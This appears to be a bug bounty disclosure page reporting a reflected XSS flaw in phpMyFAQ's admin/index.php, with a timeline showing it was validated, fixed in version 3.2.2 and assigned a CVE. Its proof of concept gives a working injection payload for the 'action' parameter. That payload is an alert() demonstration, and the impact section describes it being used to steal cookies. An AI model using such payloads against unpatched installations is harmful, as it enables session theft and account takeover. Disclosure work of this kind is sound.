Reflected XSS in /admin/index.php in thorsten/phpmyfaq

Valid

Reported on

Sep 30th 2023

Description

Description I noticed, your website is very secure. But you overlooked a flaw XSS

Proof of Concept

  1. Step 1: Access the demo website
  2. Step 2: Access admin/index.php?action=ngductung"><img src/onerror="alert('XSS')

Payload: ngductung"><img src/onerror="alert('XSS')

  1. Step 3: Detect XSS

Video PoC

https://ngductung-my.sharepoint.com/:v:/g/personal/ngductung_ngductung_id_vn/EcbTzZBsrXZBuZdf2aScnQ0BOWeP44cBiTwnpDIoV79aOQ?nav=eyJyZWZlcnJhbEluZm8iOnsicmVmZXJyYWxBcHAiOiJPbmVEcml2ZUZvckJ1c2luZXNzIiwicmVmZXJyYWxBcHBQbGF0Zm9ybSI6IldlYiIsInJlZmVycmFsTW9kZSI6InZpZXciLCJyZWZlcnJhbFZpZXciOiJNeUZpbGVzTGlua0RpcmVjdCJ9fQ&e=Zqdo9L

Impact

This security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 2 months ago
thorsten/phpmyfaq maintainer has acknowledged this report 2 months ago
Thorsten Rinne validated this vulnerability 2 months ago
tungnd has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne marked this as fixed in 3.2.2 with commit 97e813 2 months ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Oct 31st 2023
Thorsten Rinne published this vulnerability a month ago
to join this conversation